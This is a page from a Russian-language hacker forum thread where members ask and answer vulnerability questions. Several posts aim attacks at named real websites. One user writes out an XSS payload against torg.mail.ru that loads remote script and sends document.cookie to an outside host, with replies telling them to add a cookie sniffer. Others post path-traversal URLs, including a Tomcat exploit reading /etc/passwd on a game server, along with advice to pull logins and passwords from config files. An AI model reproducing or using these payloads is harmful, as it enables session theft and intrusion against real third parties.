HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 587 из 2438 « Первая < 87487537577 583 584 585 586 587 588 589 590 591 59763768710871587 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #5861  
Старый 09.03.2009, 21:13
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию
В basic используется Base64 шифрование.
 
Ответить с цитированием

  #5862  
Старый 09.03.2009, 21:18
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию
Для передачи - шифрование base64, но в самих файлах (.htpasswd) пассы обычно зашифрованы DES'ом
 
Ответить с цитированием

  #5863  
Старый 09.03.2009, 21:56
roddik
Познающий
Регистрация: 14.01.2009
Сообщений: 93
С нами: 9116636

Репутация: 39
По умолчанию
Цитата:
Сообщение от faza02  
http://www.zabihah.com/da.php?id=../
можно ли что нибудь проинклудить, при вот таом префиксе..
http://www.zabihah.com/da.php?id=1/../../../../../index
 
Ответить с цитированием

  #5864  
Старый 10.03.2009, 10:45
Seshh
Новичок
Регистрация: 04.03.2009
Сообщений: 23
С нами: 9045926

Репутация: 0
По умолчанию

Вопрос:
допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>

Вопрос, как её заносить в ссылку на моём хосте по которой должен отклик от жертвы произойти, со скриптом ("><script>alert(document.cookie)</script>) или без ?????
 
Ответить с цитированием

  #5865  
Старый 10.03.2009, 10:48
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию
Так и заноси, только добавь адрес сниффера и закодируй содиржимое алерта...
 
Ответить с цитированием

  #5866  
Старый 10.03.2009, 10:55
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами: 9837719

Репутация: 466
По умолчанию
если хош украсть куки тебе ишо нужен сниффер!
тута усе расписано было!
 
Ответить с цитированием

  #5867  
Старый 10.03.2009, 14:42
Seshh
Новичок
Регистрация: 04.03.2009
Сообщений: 23
С нами: 9045926

Репутация: 0
Question
Цитата:
Сообщение от -m0rgan-  
Так и заноси, только добавь адрес сниффера и закодируй содиржимое алерта...
Т.е. выглядеть будет примерно так???:

http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>'><script src=http://miliniva.narod.ru/js.js></script>

А в Js.js: img=new Image();img.src="http://antichat.org/s/Seshh.gif?"+document.cookie;
 
Ответить с цитированием

  #5868  
Старый 10.03.2009, 16:02
VIP
Участник форума
Регистрация: 29.12.2004
Сообщений: 105
С нами: 11243422

Репутация: 21
По умолчанию
Как быть offline vkontakte.ru
Цитата:
Сообщение от VIP  
Нагуглил, что проблема решается, если не трогать скрипт profile.php, то есть не заходить на свою страницу и на страницы других пользователей. Но вот вопрос возникает. Как я понимаю сам этот скрипт находится в отдельном файле где-то в кеше и при загрузки странички пользователя он просто исполняется и отправляет инфу о том, что ты онлайн. Но если он находится в кеше стало быть его можно пропатчить что-бы он как бы исполнялся но инфу не отправлял. Честно говоря я ничего не понимаю в этой системе. это всё только мои догадки. Если что-то не так то поправьте меня. Понятно, что можно тупо не заходить на страницы пользователей, но хочется именно заходить и быть offline.

Где под firefox 3 в ubuntu можно найти сам этот profile.php ?
 
Ответить с цитированием

  #5869  
Старый 10.03.2009, 16:48
^YaHoo^
Banned
Регистрация: 02.01.2009
Сообщений: 29
С нами: 9133839

Репутация: 85
По умолчанию
Здравствуйте нашел уязвимость Apache Tomcat v.5.5.26 Directory Traversal на одном игровом сервере http://la2midland.ru вот и мне сканер выдает такую строку http://la2midland.ru:80/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd что с этим можно сделать?
 
Ответить с цитированием

  #5870  
Старый 10.03.2009, 16:55
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию
^YaHoo^ ну ты типо читаешь файлы на сервере, ищи конфигурационные файлы и бери оттуда логины и пассы
 
Ответить с цитированием
Ответ
Страница 587 из 2438 « Первая < 87487537577 583 584 585 586 587 588 589 590 591 59763768710871587 > Последняя »



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.